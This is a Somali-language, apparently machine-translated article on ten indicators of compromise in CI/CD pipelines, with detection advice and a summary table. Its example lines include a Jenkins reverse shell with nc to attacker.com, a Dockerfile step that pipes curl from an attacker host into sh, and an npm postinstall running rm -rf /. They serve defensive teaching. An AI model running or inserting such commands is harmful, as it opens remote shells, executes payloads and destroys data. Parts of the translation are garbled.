Hordhac: Waa maxay Tilmaamayaasha Tanaasulka ee Amniga Internetka?
Tilmaamayaasha tanaasulka waa calaamadaha digniinta ugu horreeya ee nidaamkaaga ama pipeline waxaa laga yaabaa in weerar lagu qaado. Erayada fudud, tilmaamayaasha tanaasulka waa raadad ay ka tageen weeraryahannadu, sida wax qariib ah logins, isbeddellada faylka, ama malware-ka qarsoon. Amniga internetka ee IOC, waxay u dhaqmaan sida faraha oo kale goobta dambiga, iyagoo ku siinaya caddayn cad oo ah in wax khaldan yihiin. Sidaa darteed, marka horumariyayaashu ay weydiiyaan Waa maxay tilmaamayaasha tanaasulka, jawaabtu kuma koobna server-yada ama dab-damiska, waxa kale oo ku jira khataro qarsoon oo casri ah CI/CD pipelines.
Kuwaas oo kale pipelines, weeraryahannadu waxay wax ka beddeli karaan koodhka, waxay ku duri karaan ku-tiirsanaanta xaasidnimada leh, ama waxay beddeli karaan tallaabooyinka dhismaha iyagoon la dareemin. Si kastaba ha ahaatee, hagayaasha badankood wali waxay diiradda saaraan oo keliya server-yada ama shabakadaha. Natiijo ahaan, silsiladda sahayda software-ka ayaa noqotay mid ka mid ah bartilmaameedyada ugu fudud.
Taasina waa sababta loo helo tilmaamo tanaasul ah CI/CD pipelines waa lama huraan. Waxa ugu muhiimsan, waxay ka caawisaa kooxaha inay xakameeyaan malware-ka, ilaaliyaan siraha, iyo inay sugaan tallaabo kasta oo software-ka la qaado.
10-ka Tilmaame ee ugu Sareeya ee Heshiisiinta CI/CD Pipelines
Marka la sharraxayo tilmaamayaasha tanaasulka, liisaska badankood waxay diiradda saaraan server-yada ama shabakadaha. CI/CD pipelines, weeraryahannadu waxay ka tagaan faraha faraha oo aad u kala duwan. Aqoonsiga calaamadahan waa muhiim u ah difaaca firfircoon. Hoos waxaa ku qoran 10ka calaamadood ee casriga ah ee IOC ee horumariye kasta iyo injineer amni uu fiiro gaar ah u leeyahay.
1. Isbeddellada Ku-tiirsanaanta Shakiga Leh
Mid ka mid ah tilmaamaha ugu muhiimsan ee lagu garto isku tanaasulka pipelines waa cusbooneysiin degdeg ah oo ku tiirsanaan ah oo qariib ah. Weeraryahannadu waxay inta badan isticmaalaan meel ay horumariyayaasha kalsoonida ku hayaan maamulayaasha xirmooyinka si ay ugu daraan xirmooyin khatar ah.
Tusaale ahaan, npm a package.json kala duwanaanshaha si lama filaan ah waxaa ka mid noqon kara:
Isbeddellada noocan oo kale ah waxay u ekaan karaan kuwo ammaan ah laakiin waxay ku dari karaan koodka trojanized dhisme kasta.
Saameyn: Dhismayaasha la jabsaday waxay dhaxlaan malware-ka isha.
Ogaanshaha: ku dhaqan dib u eegista ku tiirsanaanta, la soco kala duwanaanshaha faylka qufulka, oo iskaan garee xirmooyinka cusub mar walba.
2. Koodhka qarsoon ee ku jira dhismayaasha
Qorayaasha malware-ka waxay ku tiirsan yihiin qarinta macluumaadka si ay uga gudbaan dib u eegista. Natiijo ahaan, tilmaamahan tanaasulka ah ayaa ku jira CI/CD pipelines waxay noqon kartaa mid ka mid ah kuwa ugu adag in la qabto. Xaqiiqdii, culaysyada qarsoon badanaa waxay ku dhacaan maktabadaha isha furan ama sawirrada weelka iyada oo aan la ogeysiin.
Tusaale ahaan:
- Xirmo PyPI ah oo la isticmaalayo
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - Sawir Docker ah oo ay ku jiraan laba-geesoodka UPX ee aan loo baahnayn.
- JavaScript oo ka buuxa
\x41\x42baxsashada waxay qarinaysaa xadayaasha aqoonsiga.
Saameyn: Koodhka qarsoon wuxuu si aamusnaan ah u shaqeeyaa inta lagu jiro dhismaha ama waqtiga shaqada, taasoo ka dhigaysa calaamad muhiim u ah amniga internetka ee IOC.
Ogaanshaha: Isku dar SAST iyadoo la adeegsanayo iskaanka malware-ka si loo calaamadeeyo koodka la soo dhigay ama la duubay. Waxa ugu muhiimsan, u daawee daah-furka sidii calan cas oo u qalma baaritaan dheeraad ah.
3. Sirta Lagu Soo Bandhigay Git: Khatar Amniga Internetka ah oo Caadi ah oo IOC ah
CI/CD pipelines badanaa waxay si toos ah uga dhaxlaan kaydka. Si kastaba ha ahaatee, marka sirtu ka soo muuqato Git, waxay noqdaan mid ka mid ah jawaabaha ugu cadcad ee su'aasha "waa maxay tilmaamaha tanaasulka ee pipelineMarka aqoonsiyadu ay soo gaaraan Git, weeraryahannadu waxay si aan xad lahayn uga faa'iideysan karaan.
Tusaale ahaan:
- A
.envfile ka koobanAWS_SECRET_KEY=. - Calaamado la riixay
config.json. - Siraha wali way ka muuqdaan taariikhda Git xitaa ka dib marka laga saaro.
Saameyn: Furaha la soo bandhigay waxay si toos ah u siiyaan weeraryahannada marin u helidda CI/CD pipelines, nidaamyada daruuraha, ama kaydka xogta. Sidaa darteed tani waa mid ka mid ah tilmaamayaasha ugu khatarta badan ee tanaasulka.
Ogaanshaha: Isticmaal pre-commit hooks iyo shaqooyinka CI ee baarista sirta ah, isla markiibana ka noqo furayaasha daadanaya. Intaa waxaa dheer, dhaqan geli hagaajin otomaatig ah si loo yareeyo daaqadaha soo-gaadhista.
4. La carqaladeeyay Pipeline Qaabeynta: Tilmaamayaasha Qarsoon ee Heshiisiinta
Pipeline habayntu waa bartilmaameedyo qiimo sare leh sababtoo ah Hal wax-ka-beddel ayaa inta badan afduuba shaqada oo dhanSidaas darteed, wax laga beddelay pipeline Faylasha waa khatar weyn oo dhanka amniga internetka ah oo IOC ay si dhif ah u ogaato qalabka la socodka dhaqameed.
Tusaale ahaan:
Ficillada GitHub:
- Gudaha GitLab: shaqo xaasidnimo ah ayaa lagu daray
.gitlab-ci.ymltaas oo meesha ka saaraysa xogta xasaasiga ah. - Jenkins:
sh "nc -e /bin/bash attacker.com 4444".
Saameyn: Isbeddelladan aan la ansixin waxay kuu rogayaan adiga pipeline albaab dambe oo joogto ah oo loogu talagalay weeraryahannada, taas oo si cad u tirinaysa inay tahay tilmaame tanaasul.
Ogaanshaha: Hirgeli habaynta la saxiixay, u baahan oggolaanshaha PR, oo la soco shaqooyinka aan la filayn. Intaa waxaa dheer, deji guardrails taas oo si toos ah u xannibaysa socodka shaqada ee la beddelay.
5. Mudnaan IaC Cilladaha
Qeexitaannada kaabayaasha ee khaldan ayaa badanaa abuura albaabo qarsoon oo gadaal ah. Natiijo ahaan, khaladaadka mudnaanta leh ee ku jira IaC waa khatar internet oo caadi ah oo IOC ah.
Tusaale ahaan:
- Qaababka lagu taageerayo Kubernetes ee ku saleysan codsiyada
privileged: true. - Shaadhadhka koofiyadda oo soo bandhigaya adeegyada
0.0.0.0:22.
Saameyn: Weeraryahannadu waxay helaan marin heer hoose ah ama waxay si cad u soo bandhigaan adeegyada gudaha. Sidaas darteed, arrimahani waxay si weyn u ballaariyaan dusha sare ee weerarka.
Ogaanshaha: Codso IaC iskaanka si loo dhaqan geliyo mudnaanta ugu yar ka hor inta aan la isku darin. Intaa waxaa dheer, hubi in qaabeyn kasta dib loo eego iyadoo qayb ka ah pipeline.
6. Dhaqamada aan caadiga ahayn ee dhismaha
Weeraryahannadu badanaa way is beddelaan pipeline dhaqan ah in lagu simbiririxo ficillo xunxun. Si kale haddii loo dhigo, dhaqdhaqaaqa dhismaha ee aan caadiga ahayn waa mid ka mid ah jawaabaha ugu cadcad ee tilmaamaya waxa ah tilmaamaha tanaasulka gudaha CI/CD pipelines.
Tusaale ahaan:
- Dhismayaashu waxay sameeyaan codsiyo shabakadeed oo dibadda ah oo loo diro domains qariib ah.
- Mashruuc Node.js ah oo si lama filaan ah u soo saaray PowerShell inta lagu jiro
npm install. - Shaqo CI ah oo soo dejinaysa laba-geesoodka waaweyn ee aan lagu qeexin qoraallada dhismaha.
Saameyn: Dhismayaasha burburay waxay u dhaqmi karaan sidii meelo lagu qaybiyo malware-ka. Waxa ugu muhiimsan, waxay ku faafiyaan culaysyo xaasidnimo ah meel kasta oo la geeyo.
Ogaanshaha: La soco diiwaannada dhismaha si aad u ogaato hababka ama isku xirnaanta aan la filayn. Intaa waxaa dheer, habayn ogaanshaha cilladaha si aad u calaamadiso dhaqamada ka baxsan caadada.
7. Qoraallada Xirmooyinka Xasaasiyadda ah sida Khataraha Amniga Internetka ee IOC
Maamulayaasha baakadaha waxay taageeraan wareegga nolosha hooks in weeraryahannadu ay ka faa'iidaystaan. Sidaa darteed, qoraallada xaasidnimada leh ee ku jira npm, PyPI, ama Dockerfiles waa tilmaamo xooggan oo muujinaya tanaasul.
Tusaale ahaan:
- npm:
postinstallqoraalku wuu shaqeynayaarm -rf /ama u calaamadaynta C2. - PyPI:
setup.pyfulinta koodka Python ee qarsoon marka la rakibayo. - Dockerfile:
RUN curl attacker.sh | sh.
Saameyn: Weerarku wuxuu fuliyaa inta lagu jiro rakibidda, ka hor inta aan la tijaabin waqtiga socodsiinta. Sidaas darteed, horumariyayaashu waligood ma ogaan karaan ilaa ay aad u daahdo.
Ogaanshaha: Baakadaha iskaan-gareeya waxay muujinayaan qoraallada rakibidda. Intaa waxaa dheer, xaddid khatarta hooks in CI/CD shaqooyinka lagu yareeyo soo-gaadhista.
8. Tilmaamayaasha Sunta Diiwaangelinta ee Heshiisiinta
Weeraryahannadu waxay beddelaan ama wax ka beddelaan walxaha qadiimiga ah ee ku jira diiwaanka, dhacdooyinkanina waa tusaalooyin buug-gacmeed oo muujinaya waxa tilmaamaya tanaasulka silsiladda sahayda. pipelines.
Tusaale ahaan:
- Calaamadda sawirka Docker oo si aamusnaan ah loogu cusbooneysiiyay lakab trojanized ah.
- Baakad gudaha ah ayaa lagu beddelay nooc sumoobay.
- npm namespace squatting, sida
lodash-proxy.
Saameyn: Dhisme kasta oo isticmaalaya qalabka diiwaanka ayaa noqda mid la jabsaday. Taasi kaliya ma aha, laakiin tanaasulku wuxuu ku fidaa adeegyada hoose.
Ogaanshaha: Ku dhaqan geli hubinta saxiixa iyo hufnaanta dhammaan jiidista diiwaanka. Intaa waxaa dheer, la soco asalka farshaxanka SBOM ansaxinta.
9. Hawlgalka Isticmaalaha ee Aan Caadiga ahayn sida Caddeynta IOC
Akoonnada la jabiyay waxay ku dhawaad had iyo jeer ka tagaan raadad aan caadi ahayn. Sidaas darteed, dhaqanka aan caadiga ahayn ee horumariyaha ayaa ah tilmaame xooggan oo ah tanaasul.
Tusaale ahaan:
- Commits ayaa la riixay 3 subaxnimo waqtiga maxalliga ah.
- Oggolaanshaha PR ee akoonnada fasaxa.
- Pipelines oo kiciyay soo noqnoqosho aan caadi ahayn.
Saameyn: Weeraryahannadu waxay si xun u isticmaalaan aqoonsiyada la xaday si ay u geliyaan isbeddello xaasidnimo ah. Ka dib oo dhan, lama oggola commits si fudud ayay ugu milmaan socodka shaqada caadiga ah.
Ogaanshaha: Monitor SCM dhaqdhaqaaqyo aan caadi ahayn, dhaqan geli MFA, oo si joogto ah u wareeji calaamadaha. Intaa waxaa dheer, digniin ka bixi shakiga commit ama qaababka ansixinta.
10. Hubinta Daacadnimada ama Saxiixa ee ku Guuldareystay Amniga Internetka ee IOC
Wax caadi ah laakiin la iska indho tiray tilmaame tanaasul waa hubinta sumcadda ama saxiixa oo guuldareysatay. Amniga internetka ee IOC, hubinadani waxay xaqiijinayaan in koodka ama waxyaabaha qadiimiga ah ay yihiin kuwo dhab ah. Ka boodista iyaga ayaa ka baxaysa. pipelines la soo bandhigay.
Tusaalayaal:
- Hash SHA256 ah oo aan la mid ahayn jeegagga la filayo.
- Saxeex GPG oo maqan ama aan sax ahayn.
- An SBOM muujinaya farshaxanno aan la saxiixin.
Saameyn: Guuldarrooyinka daacadnimada badanaa waxay la xiriiraan faragelin, sumeyn diiwaanka, ama duritaan malware ah.
Ogaanshaha: Hubinta saxiixa otomaatigga ah, ku dhaqan xaqiijinta jeegagga, oo xannib qaybaha aan la saxiixin. Ugu horreyn, ula dhaqan jeeg kasta oo fashilmay caddayn cad oo muujinaysa tanaasul.
CI/CD Tilmaamayaasha Tanaasulka Marka La Eegayo
| Tilmaamaha Tanaasulka (IOC) | Saamaynta gudaha CI/CD Pipelines | Sida Loo Ogaado |
|---|---|---|
| Isbeddellada Ku-tiirsanaanta Shakiga Leh | Weeraryahannadu waxay maktabado xaasidnimo ah ku shubaan maareeyayaasha xirmada, taasoo horseedaysa dhismayaal la jabsaday. | La soco kala duwanaanshaha faylka qufulka, ku dhaqan dib u eegista ku tiirsanaanta, oo si joogto ah u iskaan ku tiirsanaanta. |
| Koodhka Qarsoon ee Dhismayaasha | Culaysyada qarsoon waxay dhacaan inta lagu jiro dhismaha ama waqtiga socodsiinta iyada oo aan la ogaan. | Isticmaal SAST iyo iskaanka malware-ka si loo calaamadeeyo qaababka koodka ee base64, hex, ama kuwa la xirxiray. |
| Sirta Lagu Soo Bandhigay Git | Calaamadaha daatay ama furayaasha API waxay siinayaan weeraryahannada marin toos ah oo ay ku galaan nidaamyada muhiimka ah. | Ku socodsii baaritaanno qarsoodi ah Git hooks oo si toos ah uga noqo aqoonsiga daadanaya. |
| La carqaladeeyay Pipeline Qalabaynta | Shaqooyinka shaqo ee wax laga beddelay waxay u oggolaanayaan in xogta la sifeeyo ama la sii wado gudaha CI/CD. | U baahan oggolaanshaha PR, dhaqan geli habaynta la saxiixay, iyo la socoshada pipeline isbedel. |
| Mudnaanta IaC Cilladaha | Doorarka ogolaanshaha xad-dhaafka ah ama kuwa aan amniga ahayn ee aan la hubin ayaa soo bandhigaya jawiga daruuraha. | Iskaan garee faylasha Terraform, Kubernetes, iyo Helm si aad u hesho fulinta ugu yar ee mudnaanta. |
| Hab-dhaqanka Dhismaha ee aan Caadiga ahayn | Pipelineloo isticmaalo sidii meelaha lagu qaybiyo malware-ka ama dhaqdhaqaaqa dhinaca. | Falanqee diiwaannada dhismaha ee soo dejinta lama filaanka ah, hababka, ama wicitaanada dibadda. |
| Qoraallada Xirmooyinka Xunxun | Qoraallada qarsoon ee ka hor/ka dib rakibidda ayaa kiciya culaysyo lacag bixin ah ka hor tijaabinta wakhtiga socodsiinta. | Jooji qoraallada khatarta ah ee npm/PyPI oo xaddid fulinta gudaha CI/CD shaqooyinka. |
| Sunta Diiwaanka | Takhasusyada Trojan-ka ah waxay beddelaan sawirrada la aamini karo ama binaries-ka ku jira diiwaanka. | Xaqiiji jeegagga, ku dhaqan geli xaqiijinta saxiixa, oo si firfircoon u iskaan diiwaannada. |
| Dhaqdhaqaaq Isticmaale oo Aan Caadi Ahayn | Akoonnada la xumeeyay waxay si xun u riixaan commits ama kiciyaha pipelines. | Dhaqangeli MFA, la soco commits ee cilladaha, iyo falanqaynta login naqshadaha. |
| Hubinta Daacadnimada ama Saxiixa oo Guuldareystay | Waxay tilmaamaysaa koodka la farageliyay, ku tiirsanaanta, ama sawirrada soo galaya pipeline. | Hubinta hufnaanta otomaatiga ah iyo xannib qaybaha aan saxeexnayn ama aan iswaafaqsanayn. |
Sababta Amniga Internetka ee Dhaqameed ee IOC uu u seegayo CI/CD Halista
Ururada badankood waxay horeyba ula socdaan tilmaamayaasha tanaasulka server-yada, kombiyuutarrada, ama shabakadaha. Si kastaba ha ahaatee, habkan caadiga ah ee loo maro amniga internetka ee IOC ayaa iska indha tiraya CI/CD pipelines, kuwaas oo hadda ah mid ka mid ah dusha sare ee weerarka ugu muhiimsan. Dhab ahaantii, pipelines waxay muujinayaan calaamado tanaasul gaar ah oo qalabka dhaqameedku aanu ogaan karin.
Tilmaamayaasha Tanaasulka ee Amniga Dhaqanka
Nidaamka internetka ee IOC ee caadiga ah, inta badan diiradda waxaa la saaraa:
- aan caadi ahayn logincinwaanada IP-ga ama kuwa s ee soo jeedinaya aqoonsiyada la xaday.
- Xashiishka faylasha ee laga shakiyo ama isbeddelada diiwaanka ee muujinaya malware-ka.
- Taraafiko aan la filayn oo dibadda u baxaya oo tilmaamaya in xogta la sifeeyo.
Kuwani waa tilmaameyaal caan ah oo sidoo kale lagu raadraacay MITER ATT&CK qaab dhismeedka, kaas oo kharibaya dhaqamada iyo xeeladaha iska soo horjeeda ee caadiga ah. Kuwani waa calaamado waxtar leh. Si kastaba ha ahaatee, waxay inta badan khuseeyaan nidaamyada hawlgalka ama shabakadaha shirkadaha. Natiijo ahaan, waxay seegaan faragelinta qarsoon ee hore uga dhacda silsiladda sahayda software-ka.
maxaad CI/CD Pipelines Way kala duwan yihiin
CI/CD pipelines waa deegaanno otomaatig ah halkaas oo horumariyayaashu ay commit koodka, ku tiirsanaanta jiidista, iyo dhisidda sii deynta. Weeraryahannadu waxay ogyihiin in tanaasul halkan uu ku yimaado meel kasta oo la geeyo. Sidaas darteed, waa maxay tilmaamaha tanaasulka ee gudaha CI/CD pipelineAad bay u kala duwan yihiin:
- Ku tiirsanaan xaasidnimo ah oo si aamusnaan ah loogu daray package.json ama requirements.txt.
- Furaha API ama calaamadaha lagu soo bandhigay Git commitfaylasha s ama .env.
- Koodhka qarsoon ee lagu muday baakadaha npm ama PyPI.
- Faylasha Terraform ama Kubernetes oo leh astaamo aan ammaan ahayn sida mudnaanta leh: run.
- Pipeline shaqooyinka la tafatiray si loo nadiifiyo xogta ama loo furo albaabada dambe.
Calaamadaha tanaasulka ee ku jira CI/CD aan la arki karin standard qalabka amniga.
Farqiga Amniga Internetka ee IOC
In kasta oo kooxo badan ay fahmaan qiimaha tilmaamayaasha tanaasulka, haddana waxay weli ku tiirsan yihiin oo keliya ogaanshaha server-yada iyo diiwaannada shabakadda. Sidaa darteed, weeraryahannadu waxay sumeyn karaan dhismayaasha ama geli karaan malware-ka iyagoon ka tegin raadadka caadiga ah. Tani waa sababta dhacdooyinka sida XZ Utils backdoor ama xirmooyinka npm ee xaasidnimada leh aan loo ogaan ilaa ay ka gaareen wax soo saar.
Noocyadan heshiisyada silsiladda sahayda waxaa sidoo kale lagu muujiyey CISTilmaamaha amniga silsiladda sahayda ee A, kaas oo ka digaya in weeraryahannadu ay sii kordhayaan bartilmaameedsiga CI/CD pipelines iyo diiwaannada.
Qaadashada
Amniga internetka ee dhaqameed ee IOC waa lagama maarmaan laakiin kuma filna. Intaa waxaa dheer, kooxuhu waa inay aqoonsadaan tilmaamayaasha tanaasulka gaarka u ah CI/CD pipelines. Markaas oo keliya ayay ogaan karaan koodka xaasidnimada leh ama pipeline xadgudubka ka hor inta uusan ku faafin deegaannada.




